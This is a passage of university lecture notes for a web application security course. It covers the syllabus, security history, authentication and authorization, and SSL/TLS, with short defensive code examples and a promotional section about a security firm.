
CCS374 WEB APPLICATION SECURITY L T P C

2 0 2 3

Course Objectives: Understand the fundamentals of web application security; focus on the wide aspects of secure development and deployment of web applications; learn how to build secure APIs; learn the basics of vulnerability assessment and penetration testing; get an insight into hacking techniques and tools.

Unit - I FUNDAMENTALS OF WEB APPLICATION SECURITY 6


The History of Software Security - Recognizing Web Application Security Threats, Web Application Security, Authentication and Authorization, Secure Socket Layer, Transport Layer Security, Session Management - Input Validation
Unit - II SECURE DEVELOPMENT AND DEPLOYMENT 5

Web Applications Security - Security Testing, Security Incident Response Planning, The Microsoft Security Development Lifecycle (SDL), OWASP Comprehensive Lightweight Application Security Process (CLASP), The Software Assurance Maturity Model (SAMM)

Unit - III SECURE API DEVELOPMENT 6

API Security - Session Cookies, Token-Based Authentication, Securing Natter APIs: Addressing Threats with Security Controls, Rate Limiting for Availability, Encryption, Audit Logging, Securing Service-to-Service APIs: API Keys, OAuth2, Securing Microservice APIs: Service Mesh, Locking Down Network Connections, Securing Incoming Requests

Unit – IV VULNERABILITY ASSESSMENT AND PENETRATION TESTING 6


Vulnerability Assessment Lifecycle, Vulnerability Assessment Tools: Cloud-based vulnerability scanners, Host-based vulnerability scanners, Network-based vulnerability scanners, Database-based vulnerability scanners, Types of Penetration Tests: External Testing, Web Application Testing, Internal Penetration Testing, SSID or Wireless Testing, Mobile Application Testing.
Unit - V HACKING TECHNIQUES AND TOOLS 7
Social Engineering, Injection, Cross-Site Scripting (XSS), Broken Authentication and Session Management, Cross-Site Request Forgery, Security Misconfiguration, Insecure Cryptographic Storage, Failure to Restrict URL Access, Tools: Comodo, OpenVAS, Nexpose, Nikto, Burp Suite, etc.
Total Periods: 30

Course Outcomes

On completion of the course, the student can

COs   Statements                                                                                         K-Level

CO1   Understand the basic concepts of web application security and the need for it                      K2
CO2   Explain the process for secure development and deployment of web applications                      K2
CO3   Apply the skill to design and develop secure web applications that use secure APIs                 K3
CO4   Experiment with the importance of carrying out vulnerability assessment and penetration testing    K3
CO5   Apply the skill to think like a hacker and to use a hacker's tool sets                             K3

Knowledge Level: K1 – Remember, K2 – Understand, K3 – Apply, K4 – Analyze, K5 – Evaluate, K6 – Create


CO – PO – PSO Articulation Matrix

       Programme Outcomes                                                PSO
      PO1  PO2  PO3  PO4  PO5  PO6  PO7  PO8  PO9  PO10  PO11  PO12   PSO1  PSO2  PSO3
CO1    1    2    2    1    3    -    -    -    -    -     -     1      2     2     1
CO2    2    1    2    1    3    -    -    -    -    -     -     -      2     2     1
CO3    1    1    1    2    3    -    -    -    -    -     -     1      2     2     1
CO4    1    2    1    1    2    -    -    -    -    -     -     -      2     2     1
CO5    1    2    2    2    2    -    -    -    -    -     -     1      2     2     1
CO     1    2    2    2    3    -    -    -    -    -     -     1      2     2     1

Correlation levels 1, 2 and 3 are as defined below:

1. Slight 2. Moderate 3. Substantial (High)

Text Books

1. Andrew Hoffman, Web Application Security: Exploitation and Countermeasures for Modern Web Applications, First Edition, 2020, O’Reilly Media, Inc.
2. Bryan Sullivan and Vincent Liu, Web Application Security: A Beginner’s Guide, 2012, The McGraw-Hill Companies.
3. Neil Madden, API Security in Action, 2020, Manning Publications Co., NY, USA.

Reference Books

1. Michael Cross, Developer’s Guide to Web Application Security, 2007, Syngress Publishing, Inc.
2. Ravi Das and Greg Johnson, Testing and Securing Web Applications, 2021, Taylor & Francis Group, LLC.
3. Prabath Siriwardena, Advanced API Security, 2020, Apress Media LLC, USA.
4. Malcolm McDonald, Web Security for Developers, 2020, No Starch Press, Inc.
5. Allen Harper, Shon Harris, Jonathan Ness, Chris Eagle, Gideon Lenkey, and Terron Williams, Grey Hat Hacking: The Ethical Hacker’s Handbook, Third Edition, 2011, The McGraw-Hill Companies.



CCS374 WEB APPLICATION SECURITY

The History of Software Security - Recognizing Web Application Security Threats


The history of software security, particularly in the context of recognizing web application
security threats, is marked by the evolution of technology and the increasing sophistication of
cyber threats. Below is a brief overview of key milestones and developments in the history of
web application security:

1. **1990s - The Emergence of the World Wide Web:**


- The World Wide Web became publicly accessible, leading to the proliferation of
websites and web applications.

- The focus during this period was on building and expanding the web, with limited
attention to security considerations.

2. **Late 1990s to Early 2000s - Rise of Common Vulnerabilities:**


- As web applications grew in complexity, security vulnerabilities
became more apparent.

- Common vulnerabilities such as buffer overflows, SQL injection, and cross-site scripting (XSS) started to emerge.

- The concept of input validation gained attention as a crucial aspect of web application security.

3. **2002 - The Birth of OWASP:**



- The Open Web Application Security Project (OWASP) was founded to provide
resources and guidelines for improving web application security.

- The OWASP Top Ten, a list of the most critical web application security risks, was
introduced to raise awareness about common vulnerabilities.

4. **Mid-2000s - Proliferation of Web 2.0 and AJAX:**


- The advent of Web 2.0 technologies and the use of Asynchronous JavaScript and
XML (AJAX) introduced new attack vectors.

- Security researchers and attackers began to exploit vulnerabilities related to the


dynamic and interactive nature of these technologies.

5. **Late 2000s - Increased Focus on Secure Development Practices:**


- Organizations started recognizing the importance of integrating security into the
software development life cycle.

- Secure coding practices and tools became more prevalent, emphasizing the need to
consider security from the design phase onward.

6. **2010s - Evolution of Threat Landscape:**


- The threat landscape continued to evolve with the rise of mobile applications,
cloud computing, and APIs.

- Web security standards like HTTP Strict Transport Security (HSTS) and Content
Security Policy (CSP) gained adoption to enhance protection against various attacks.



7. **2017 - OWASP Top 10 Update:**
- OWASP updated its Top 10 list to reflect contemporary web application security risks,
including issues like insufficient logging and monitoring and XML external entity (XXE)
vulnerabilities.

8. **2020s - Emphasis on DevSecOps and Automation:**


- The integration of security into DevOps processes (DevSecOps) gained
momentum, emphasizing collaboration between development, operations, and
security teams.

- Automation tools for code analysis, vulnerability scanning, and penetration testing
became essential for identifying and mitigating security issues early in the development
cycle.

9. **Present - Ongoing Challenges and Innovations:**


- Web application security remains an ongoing challenge due to the ever-evolving nature
of cyber threats.

- Innovations such as artificial intelligence and machine learning are being


employed to enhance threat detection and response capabilities.

Overall, the history of software security in the context of web applications highlights the
continual need for vigilance, education, and proactive measures to address emerging threats in
an increasingly interconnected digital landscape.

The Origins of Hacking

In the past two decades, hackers have gained more publicity and notoriety than ever before. As a result, it’s easy for anyone without the appropriate background to assume that hacking is a concept closely tied to the internet and that most hackers emerged in the last 20 years.

The Enigma Machine, Circa 1930


The Enigma machine used electric-powered mechanical rotors to both encrypt and decrypt
text-based messages sent over radio waves (see Figure 1-1). The device had German origins
and would become an important technological development during the Second World War.

Automated Enigma Code Cracking, Circa 1940

Alan Turing was an English mathematician who is best known for his development of a test known today as the “Turing test.” The Turing test was developed to rate conversations generated by machines, based on the difficulty of differentiating those conversations from the conversations of real human beings. This test is often considered to be one of the foundational philosophies in the field of artificial intelligence (AI). During the Second World War, Turing also worked at Bletchley Park on automating the cryptanalysis of Enigma-encrypted messages, which led to the device described next.

Introducing the “Bombe”

A bombe was an electric-powered mechanical device that attempted to automatically reverse engineer the position of the mechanical rotors in an Enigma machine, based on mechanical analysis of messages sent from such machines.

Telephone “Phreaking,” Circa 1950

After the rise of the Enigma machine in the 1930s and the cryptographic battle that occurred between major world powers, the introduction of the telephone is the next major event in our timeline. The telephone allowed everyday people to communicate with each other over large distances, and at rapid speed. As telephone networks grew, they required automation in order to function at scale.

Anti-Phreaking Technology, Circa 1960

In the 1960s, phones were equipped with a new technology known as dual-tone multifrequency (DTMF) signaling. DTMF was an audio-based signaling language developed by Bell Systems and patented under the more commonly known trademark, “Touch Tones.” DTMF was intrinsically tied to the phone dial layout we know today, which consists of three columns and four rows of numbers. Each key on a DTMF phone emitted two very specific audio frequencies, versus a single frequency like the original tone dialing systems.

Web Application Security

**Introduction to Web Application Security:**

Web application security refers to the set of measures and practices designed to protect web
applications from various cyber threats, vulnerabilities, and unauthorized access. With the
increasing reliance on web-based technologies for business operations, e-commerce, and
communication, ensuring the security of web applications is crucial to safeguard sensitive data
and maintain the integrity and availability of online services.

**Definition of Web Application Security:**

Web application security involves implementing mechanisms and best practices to identify,
prevent, and mitigate security risks that may arise in the development, deployment, and
maintenance of web applications. It encompasses a broad range of techniques and strategies
aimed at protecting against common vulnerabilities and attacks that can exploit weaknesses
in web application code, configuration, and user interactions.



**Types of Web Application Security:**

1. **Network Security:**
- Focuses on securing the communication channels between users and web
applications. This includes encryption protocols (HTTPS), firewalls, and intrusion
detection/prevention systems.

2. **Authentication and Authorization:**


- Ensures that users are who they claim to be (authentication) and that they have the
appropriate permissions to access specific resources or perform certain actions
(authorization).

3. **Data Validation and Input Sanitization:**


- Involves validating and sanitizing user inputs to prevent injection attacks, such as
SQL injection and cross-site scripting (XSS).

4. **Security Misconfigurations:**
- Addresses issues related to improperly configured security settings, server settings, or
access controls that could expose vulnerabilities.

5. **Cross-Site Request Forgery (CSRF) Protection:**


- Mitigates the risk of attackers tricking users into performing unintended actions on
a web application where they are authenticated.

6. **File Upload Security:**


- Focuses on securing mechanisms that allow users to upload files to prevent the
execution of malicious code or the upload of harmful files.

7. **Security Headers:**



- Involves the implementation of HTTP security headers, such as HTTP Strict Transport
Security (HSTS) and Content Security Policy (CSP), to control how browsers handle
content.

8. **Web Application Firewalls (WAF):**


- Adds an additional layer of protection by filtering and monitoring HTTP traffic
between a web application and the internet to detect and block potential threats.

**Pros of Web Application Security:**

1. **Data Protection:** Ensures the confidentiality and integrity of sensitive data


processed by web applications.

2. **User Trust:** Builds and maintains trust among users by providing a secure online experience and protecting their personal information.

3. **Business Continuity:** Mitigates the risk of disruptions caused by security incidents,


ensuring continuous availability and functionality of web applications.

4. **Regulatory Compliance:** Helps organizations comply with data protection


and privacy regulations by implementing necessary security measures.

5. **Cost Savings:** Proactively addressing security issues during development can save
costs compared to dealing with breaches and their consequences.

6. **Brand Reputation:** Protects the reputation of the organization by preventing


data breaches and security incidents that could damage public perception.



**Cons of Web Application Security:**

1. **Resource Intensive:** Implementing and maintaining robust web application


security measures can be resource-intensive, requiring time, expertise, and financial
investment.

2. **Usability Challenges:** Stringent security measures may sometimes impact user


experience and require a careful balance between security and usability.

3. **Complexity:** Web application security can be complex due to the dynamic and
evolving nature of cyber threats, requiring continuous monitoring and adaptation.

4. **False Positives:** Security measures, such as WAFs, may generate false positives,
potentially blocking legitimate traffic and causing inconvenience to users.

5. **Resistance to Change:** Introducing security measures may face resistance


from developers or users accustomed to less secure but more convenient practices.

6. **Ongoing Vigilance:** Cyber threats evolve over time, requiring constant vigilance
and updates to security measures to address new vulnerabilities.

In summary, web application security is a multifaceted field that plays a crucial role in
protecting online assets and user data. While it comes with challenges, the benefits of a
secure web application environment far outweigh the potential drawbacks. Organizations
must adopt a holistic and proactive approach to address security concerns and create a
robust defense against cyber threats.



Common Web Application Security Threats

1. Insecure Design

2. SQL Injection

3. Faulty Access Control

4. Authorization Failure

5. Security Misconfiguration

6. Outdated Components

7. Security Logging and Monitoring Failures


Authentication and Authorization
Authentication and authorization are fundamental components of web application security,
ensuring that users access only the resources and functionalities they are allowed to. Let's delve
into each of these concepts:

### Authentication:

**Definition:**
Authentication is the process of verifying the identity of a user, system, or application. In the
context of web applications, it involves confirming that the user is who they claim to be.

**Key Elements:**



1. **Credentials:** Users typically provide credentials such as usernames and passwords,
though other factors like biometrics, smart cards, or two-factor authentication can be used
for stronger authentication.

2. **Authentication Factors:**
- **Something You Know:** Passwords, PINs.
- **Something You Have:** Smart cards, security tokens.
- **Something You Are:** Biometrics like fingerprints, retina scans.

**Authentication Methods:**

1. **Single-Factor Authentication (SFA):**


- Relies on one authentication factor (e.g., password only).

2. **Multi-Factor Authentication (MFA):**


- Requires two or more authentication factors, enhancing security.

**Best Practices:**

1. **Strong Password Policies:** Encourage users to create complex passwords and update
them regularly.

2. **Multi-Factor Authentication:** Implement MFA to add an extra layer of security.

3. **Secure Transmission:** Ensure that authentication credentials are transmitted


securely over encrypted connections (e.g., HTTPS).



### Authorization:

**Definition:**
Authorization is the process of granting or denying access to specific resources, functionalities,
or data based on the authenticated user's permissions.

**Key Elements:**

1. **Roles and Permissions:** Users are assigned roles, and each role has specific
permissions defining what actions or data the user can access.

2. **Access Control Lists (ACLs):** Lists specifying the permissions assigned to each user
or system.

**Authorization Models:**

1. **Role-Based Access Control (RBAC):**

- Users are assigned roles, and roles are associated with specific permissions (see the sketch after this list).

2. **Attribute-Based Access Control (ABAC):**


- Access decisions are based on attributes of the user, the resource, and the environment.
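
To make the RBAC model concrete, here is a minimal Python sketch. The roles, permission names, and the in-memory mapping are illustrative assumptions, not part of any particular framework; a real application would load this mapping from a database or policy store rather than hard-coding it.

```python
# Hypothetical role -> permission mapping for illustration only.
ROLE_PERMISSIONS = {
    "admin":   {"read_report", "edit_report", "manage_users"},
    "analyst": {"read_report", "edit_report"},
    "viewer":  {"read_report"},
}

def is_authorized(role: str, permission: str) -> bool:
    """Grant access only if the user's role carries the requested permission."""
    return permission in ROLE_PERMISSIONS.get(role, set())

print(is_authorized("analyst", "edit_report"))  # True
print(is_authorized("viewer", "manage_users"))  # False
```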

**Best Practices:**

1. **Principle of Least Privilege (PoLP):**



- Users should have the minimum level of access necessary to perform their job
functions.

2. **Regular Access Reviews:**


- Periodically review and update user roles and permissions to ensure they align
with current requirements.

3. **Fine-Grained Authorization:**
- Implement granular controls, specifying permissions at a detailed level rather than
granting broad access.

**Authentication and Authorization Workflow:**

1. **Authentication:**
- User provides credentials.
- Credentials are verified against stored credentials (e.g., in a database).
- If credentials are valid, the user is authenticated.

2. **Authorization:**
- Authenticated user's permissions are checked.
- Access is granted or denied based on the user's permissions.
- Users can access only the resources and perform only the actions permitted by their
role and permissions.

**Challenges and Considerations:**

1. **Session Management:**



- Securely manage user sessions to prevent unauthorized access or session hijacking.

2. **Token Security:**
- If using tokens for authentication, ensure they are securely generated,
transmitted, and validated.

3. **User Provisioning and Deprovisioning:**


- Implement effective processes for adding, updating, and removing user accounts to
ensure accurate access control.

In summary, a robust web application security strategy involves effective authentication and
authorization mechanisms. These components work together to verify user identities and
control access to resources, helping to prevent unauthorized access and protect sensitive data.

Introduction:

Authentication and authorization are fundamental components of web application security.


Properly implementing these mechanisms is crucial to safeguard sensitive data, protect user
privacy, and prevent unauthorized access. In this blog, we will explore best practices for
implementing authentication and authorization in web applications, drawing insights from
CronJ, a leading technology company specializing in web application security solutions.

The Importance of Authentication and Authorization:

Authentication verifies the identity of users, ensuring they are who they claim to be, while authorization determines the actions and resources a user is allowed to access within an application. Together, these mechanisms form the foundation of web application security.

Implementing Secure Authentication:

2.1 Strong Password Policies: Enforce password complexity rules, such as minimum length,
combination of characters, and regular password updates. Encourage the use of password
managers and multi-factor authentication (MFA) for added security.

2.2 Secure Credential Storage: Store user passwords using strong, salted password-hashing algorithms. Avoid storing plain-text passwords or using weak hashing algorithms.
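
As a sketch of point 2.2, the following uses Python's standard-library scrypt key-derivation function. The cost parameters shown (n, r, p) are common starting points, not prescriptive values.

```python
import hashlib
import hmac
import os

def hash_password(password: str):
    """Derive a slow, salted hash; store both the salt and the digest."""
    salt = os.urandom(16)  # unique random salt per user
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("wrong guess", salt, digest))                   # False
```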

2.3 Implementing MFA: Implement multi-factor authentication, which combines multiple


authentication factors such as passwords, biometrics, or one-time codes. This adds an extra
layer of security, making it harder for unauthorized users to gain access.

Ensuring Robust Authorization:

3.1 Role-Based Access Control (RBAC): Implement RBAC to assign specific roles and
permissions to users based on their responsibilities and privileges. This ensures that users
can only access the resources necessary for their job functions.

3.2 Principle of Least Privilege: Adhere to the principle of least privilege, granting users
only the minimum level of access required to perform their tasks. Regularly review and
revoke unnecessary privileges to minimize the risk of unauthorized access.

3.3 Fine-Grained Access Control: Implement fine-grained access control mechanisms,


such as attribute-based access control (ABAC), to define access policies based on specific
user attributes, conditions, or context. This allows for more granular control over resource
authorization.



Securing Authentication and Authorization Processes:

4.1 Secure Communication Channels: Use secure protocols like HTTPS/TLS to encrypt
data transmitted between the user’s device and the web application server. This prevents
unauthorized interception and protects sensitive information.

4.2 User Session Management: Implement secure session management techniques, such as
session timeouts, secure cookie settings, and session revocation upon logout or inactivity.
This prevents session hijacking and unauthorized access to user accounts.

4.3 Regular Security Updates and Patches: Stay updated with the latest security patches and
updates for the web application framework, libraries, and dependencies used. This helps
address security vulnerabilities and protect against emerging threats.

CronJ’s Expertise in Web Application Security Solutions:

CronJ offers expertise in web application security solutions, providing comprehensive


measures to enhance authentication and authorization processes. Their services
include:

5.1 Security Audits and Assessments: CronJ conducts security audits and assessments to
identify vulnerabilities, assess risks, and recommend remediation strategies for
authentication and authorization processes in web applications.

5.2 Implementation of Secure Authentication and Authorization: CronJ assists in


implementing robust authentication and authorization mechanisms tailored to the specific
needs of web applications. They leverage industry best practices and cutting-edge
technologies to ensure secure user access.



5.3 Security Training and Education: CronJ offers security training and education
programs to empower developers and stakeholders with the knowledge and skills to
implement and maintain secure authentication and authorization practices.

Conclusion:

Implementing strong authentication and authorization mechanisms is essential for web


application security. By following best practices such as secure authentication, robust
authorization, and regular security updates, web applications can effectively protect user data
and prevent unauthorized access. With CronJ’s expertise in web application security solutions,
organizations can enhance their authentication and authorization processes
to ensure a secure and trusted web environment
Secure Socket Layer

Secure Socket Layer (SSL) provides security to the data that is transferred between a web browser and a server. SSL encrypts the link between a web server and a browser, which ensures that all data passed between them remains private and free from attack.
 SSL record protocol
 Handshake protocol
 Change-cipher spec protocol
 Alert protocol



(Figure: SSL protocol stack.)

SSL Record Protocol:


SSL Record provides two services to SSL connection.
 Confidentiality
 Message Integrity
In the SSL Record Protocol, application data is divided into fragments. Each fragment is compressed, and a MAC (Message Authentication Code) generated by a hash algorithm such as SHA (Secure Hash Algorithm) or MD5 (Message Digest) is appended. The result is then encrypted, and finally the SSL record header is prepended to the data.



Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client and server to
authenticate each other by sending a series of messages to each other. Handshake protocol uses
four phases to complete its cycle.
 Phase-1: Both client and server send hello packets to each other. In this phase, the session ID, cipher suite, and protocol version are exchanged for security purposes.
 Phase-2: The server sends its certificate and Server-key-exchange message. The server ends Phase-2 by sending the Server-hello-done packet.
 Phase-3: In this phase, the client replies to the server by sending its certificate and Client-key-exchange message.
 Phase-4: In Phase-4 the Change-cipher-spec exchange occurs, after which the Handshake Protocol ends.



(Figure: diagrammatic representation of the SSL Handshake Protocol phases.)

Change-cipher Protocol:
This protocol uses the SSL Record Protocol. Until the Handshake Protocol is completed, the negotiated parameters remain in a pending state; after the handshake, the pending state is converted into the current state. The Change-cipher protocol consists of a single message, 1 byte in length, which can take only one value. Its purpose is to cause the pending state to be copied into the current state.

DEPARTMENT OF AI&DS Page 21


Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each message in this protocol contains 2 bytes: the first byte indicates the severity level, and the second byte describes the specific alert.

The level is further classified into two parts:

Warning (level = 1):


This Alert has no impact on the connection between sender and receiver. Some of them
are:
Bad certificate: When the received certificate is corrupt.
No certificate: When an appropriate certificate is not available.
Certificate expired: When a certificate has expired.
Certificate unknown: When some other unspecified issue arose in processing the certificate,
rendering it unacceptable.
Close notify: It notifies that the sender will no longer send any messages in the connection.
Unsupported certificate: The type of certificate received is not supported.
Certificate revoked: The received certificate is in the revocation list.

Fatal Error (level = 2):


This Alert breaks the connection between sender and receiver. The connection is stopped; it cannot be resumed, but it can be restarted. Some of them are:
Handshake failure: When the sender is unable to negotiate an acceptable set of security parameters given the options available.
Decompression failure: When the decompression function receives improper input.
Illegal parameters: When a field is out of range or inconsistent with other fields.
Bad record MAC: When an incorrect MAC is received.
Unexpected message: When an inappropriate message is received.
Salient Features of Secure Socket Layer:
 The advantage of this approach is that the service can be tailored to the specific
needs of the given application.
 Secure Socket Layer was originated by Netscape.
 SSL is designed to make use of TCP to provide reliable end-to-end secure
service.



 This is a two-layered protocol.
Versions of SSL:
SSL 1 – Never released, due to serious security flaws.
SSL 2 – Released in 1995.
SSL 3 – Released in 1996.
TLS 1.0 – Released in 1999.
TLS 1.1 – Released in 2006.
TLS 1.2 – Released in 2008.
TLS 1.3 – Released in 2018.

SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the
identity of a website or an online service. The certificate is issued by a trusted third-party
called a Certificate Authority (CA), who verifies the identity of the website or service before
issuing the certificate. The SSL certificate has several important characteristics that make it a
reliable solution for securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure the
communication between the website or service and its users. This ensures that
the sensitive information, such as login credentials and credit card information,
is protected from being intercepted and read by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the website or service,
ensuring that users are communicating with the intended party and not with an
impostor. This provides assurance to users that their information is being
transmitted to a trusted entity.
3. Integrity: The SSL certificate uses message authentication codes (MACs) to
detect any tampering with the data during transmission. This ensures that the
data being transmitted is not modified in any way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data, meaning that
the recipient of the data cannot deny having received it. This is important in
situations where the authenticity of the information needs to be established, such
as in e-commerce transactions.
5. Public-key cryptography: SSL certificates use public-key cryptography for secure
key exchange between the client and server. This allows the client and server to
securely exchange encryption keys, ensuring that the encrypted information can
only be decrypted by the intended recipient.
6. Session management: SSL certificates allow for the management of secure sessions, including the resumption of secure sessions after interruption. This helps to reduce the overhead of establishing a new secure connection each time a user accesses a website or service.
7. Certificates issued by trusted CAs: SSL certificates are issued by trusted CAs,
who are responsible for verifying the identity of the website or service before
issuing the certificate. This provides a high level of trust and assurance to users
that the website or service they are communicating with is authentic and
trustworthy.
In addition to these key characteristics, SSL certificates also come in various levels of validation, including Domain Validation (DV), Organization Validation (OV), and Extended Validation (EV). The level of validation determines the amount of information that is verified by the CA before issuing the certificate, with EV certificates providing the highest level of assurance and trust to users.
Overall, the SSL certificate is an important component of online security, providing encryption,
authentication, integrity, non-repudiation, and other key features that ensure the secure and
reliable transmission of sensitive information over the internet.
Secure Socket Layer (SSL) is a cryptographic protocol designed to provide secure
communication over a computer network. SSL has been succeeded by Transport Layer
Security (TLS), but the term "SSL" is often used colloquially to refer to both SSL and TLS.
The primary use of SSL/TLS in web application security is to establish a secure and
encrypted connection between a web server and a client, typically a web browser. This
secure connection helps protect sensitive data during transmission, preventing unauthorized
access and tampering. Here are key aspects of SSL/TLS in web application security:

### 1. **Encryption:**

- **Purpose:** SSL/TLS encrypts data exchanged between the web server and the client,
ensuring that even if intercepted, the data remains unreadable without the appropriate
decryption key.

- **Implementation:** The encryption process involves using cryptographic


algorithms to transform data into an unreadable format (cipher text) that can only be
deciphered by the intended recipient.



### 2. **Authentication:**

- **Purpose:** SSL/TLS provides a means for the client to verify the authenticity of
the server and, in some cases, vice versa. This helps users ensure they are connecting to a
legitimate and trusted website.

- **Certificates:** SSL/TLS uses digital certificates to establish the identity of the server.
Certificates are issued by Certificate Authorities (CAs) and contain information about the
server's identity.

### 3. **Data Integrity:**

- **Purpose:** SSL/TLS ensures that the data transmitted between the client and the
server has not been tampered with during transmission.

- **Hash Functions:** Cryptographic hash functions are used to generate checksums


(hashes) for the transmitted data. The recipient can verify the integrity of the data by
comparing the received hash with the calculated hash.
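
TLS computes and verifies these per-record checksums internally; the sketch below is a simplified illustration of the underlying idea rather than the actual TLS record format. It uses an HMAC from Python's standard library, and the shared key shown is a placeholder that TLS would in reality derive during the handshake.

```python
import hashlib
import hmac

# Placeholder: in real TLS, this key is derived during the handshake.
SHARED_KEY = b"session-key-negotiated-during-handshake"

def protect(message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag so any in-transit modification is detectable."""
    tag = hmac.new(SHARED_KEY, message, hashlib.sha256).digest()
    return message + tag

def verify(blob: bytes) -> bytes:
    """Recompute the tag and compare in constant time; raise if data was altered."""
    message, tag = blob[:-32], blob[-32:]  # SHA-256 tags are 32 bytes
    expected = hmac.new(SHARED_KEY, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: data was modified in transit")
    return message

blob = protect(b"GET /account HTTP/1.1")
print(verify(blob))  # b'GET /account HTTP/1.1'
```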

### 4. **Secure Handshake:**

- **Purpose:** Before establishing a secure connection, the client and server perform
a handshake to negotiate the encryption algorithms and exchange necessary parameters.

- **Key Exchange:** During the handshake, a process called key exchange occurs, where
the client and server agree on a shared secret key for encrypting and decrypting data.

### 5. **HTTPS (HTTP Secure):**

- **Purpose:** SSL/TLS is commonly implemented in web applications using HTTPS,


which stands for HTTP Secure. It is the secure version of the HTTP protocol and uses
SSL/TLS to provide a secure connection.

- **URL Prefix:** URLs using HTTPS start with "https://" instead of "http://".



### 6. **TLS Versions:**

- **Evolution:** Over time, various versions of TLS have been released to address
vulnerabilities and improve security. It is essential to use the latest and most secure version
supported by both the server and the client.

- **Compatibility:** While newer versions of TLS are more secure, compatibility


issues may arise with older systems. Striking a balance between security and
compatibility is crucial.

### 7. **SSL/TLS Offloading:**

- **Purpose:** In some architectures, SSL/TLS termination or offloading occurs at a


dedicated device or load balancer before reaching the web server. This can improve
performance and scalability.

- **Encryption at the Edge:** Offloading moves the burden of SSL/TLS processing


from the web server to a dedicated device, allowing the server to focus on handling
application logic.

### 8. **Perfect Forward Secrecy (PFS):**

- **Purpose:** PFS is an additional security feature that ensures that even if a long-term
secret key is compromised, past communication cannot be decrypted.

- **Key Agreement Protocols:** PFS is typically achieved using key agreement


protocols like Diffie-Hellman.

### 9. **Security Best Practices:**

- **Regular Certificate Renewal:** SSL/TLS certificates have an expiration date.


Regularly renew certificates to maintain the security of the connection.

- **Cipher Suite Configuration:** Ensure that the web server is configured to use strong
and secure cipher suites, and disable support for weak or vulnerable algorithms.

- **HSTS (HTTP Strict Transport Security):** Implement HSTS to enforce the use of
HTTPS, reducing the risk of downgrade attacks.
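
As an illustration of these best practices, the following minimal sketch adds HSTS and related headers to every response of a small Flask application. Flask is chosen only as a familiar example, and the header values shown are common starting points rather than universal recommendations.

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_security_headers(response):
    # Tell browsers to use HTTPS for the next year, including subdomains.
    response.headers["Strict-Transport-Security"] = (
        "max-age=31536000; includeSubDomains"
    )
    # Only allow content (scripts, styles, images) from our own origin.
    response.headers["Content-Security-Policy"] = "default-src 'self'"
    # Stop browsers from MIME-sniffing responses into executable types.
    response.headers["X-Content-Type-Options"] = "nosniff"
    return response

@app.route("/")
def index():
    return "hello"
```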



SSL/TLS plays a critical role in securing data in transit, and its adoption is a fundamental
practice in modern web application security. Organizations should stay informed about the
latest developments in SSL/TLS protocols and best practices to maintain a secure online
environment.
Transport layer Security
Transport Layer Security (TLS) is designed to provide security at the transport layer. TLS was derived from a security protocol called Secure Socket Layer (SSL). TLS ensures that no third party may eavesdrop on or tamper with any message.
There are several benefits of TLS:

 Encryption:
TLS/SSL can help to secure transmitted data using encryption.
 Interoperability:
TLS/SSL works with most web browsers, including Microsoft Internet Explorer
and on most operating systems and web servers.
 Algorithm flexibility:
TLS/SSL provides operations for authentication mechanism, encryption
algorithms and hashing algorithm that are used during the secure session.
 Ease of Deployment:
Many applications use TLS/SSL transparently on a Windows Server 2003 operating system.
 Ease of Use:
Because TLS/SSL is implemented beneath the application layer, most of its operations are completely invisible to the client.

Working of TLS:
The client connects to the server (using TCP) and sends a number of specifications:
1. Which version of SSL/TLS it supports.
2. Which cipher suites and compression methods it wants to use.
The server checks the highest SSL/TLS version that is supported by both sides, picks a cipher suite from the client's options (if it supports one), and optionally picks a compression method. After this the basic setup is done, and the server provides its certificate. This certificate must be trusted either by the client itself or by a party that the client trusts. Having verified the certificate and being certain this server really is who it claims to be (and not a man in the middle), a key is exchanged. This can be a public key, a "PreMasterSecret", or simply nothing, depending upon the cipher suite.
Both the server and the client can now compute the key for symmetric encryption. The handshake is finished, and the two hosts can communicate securely. A connection is closed with a close-notify alert; if the TCP connection is simply dropped instead, both sides will know the connection was improperly terminated. The connection cannot be compromised this way, though, merely interrupted.
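
The handshake described above can be observed with Python's standard library. The sketch below opens a TLS connection (the host name example.org is just a placeholder for any public TLS endpoint) and prints the negotiated protocol version and cipher suite.

```python
import socket
import ssl

HOST = "example.org"  # placeholder host with a public TLS endpoint

# create_default_context() enables certificate and hostname verification
# against the system's trusted CA store.
context = ssl.create_default_context()

with socket.create_connection((HOST, 443)) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=HOST) as tls_sock:
        # The handshake (version/cipher negotiation, certificate check,
        # key exchange) completes inside wrap_socket().
        print("protocol:", tls_sock.version())  # e.g. TLSv1.3
        print("cipher:  ", tls_sock.cipher())   # (name, protocol, secret bits)
```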
Transport Layer Security (TLS) is a cryptographic protocol designed to provide secure
communication over a computer network. TLS is the successor to Secure Sockets Layer
(SSL), and it is commonly used to secure data transmission on the internet, particularly in
web applications. TLS ensures the confidentiality, integrity, and authenticity of the data
exchanged between a client (typically a web browser) and a server. Here are key aspects of
TLS in web application security:

### 1. **Encryption:**

- **Purpose:** TLS encrypts data during transmission, ensuring that even if intercepted,
the data remains confidential.

- **Symmetric and Asymmetric Encryption:** TLS uses a combination of symmetric


and asymmetric encryption. Symmetric encryption is used for bulk data transfer, while
asymmetric encryption is used for key exchange and authentication.

### 2. **Authentication:**

- **Purpose:** TLS provides a mechanism for both the client and the server to
authenticate each other, ensuring that they are communicating with the intended and
legitimate parties.

- **Digital Certificates:** TLS relies on digital certificates to verify the identity of the
server (and optionally, the client). Certificates are issued by Certificate Authorities
(CAs) and contain information such as the public key and details about the entity's
identity.

### 3. **Data Integrity:**



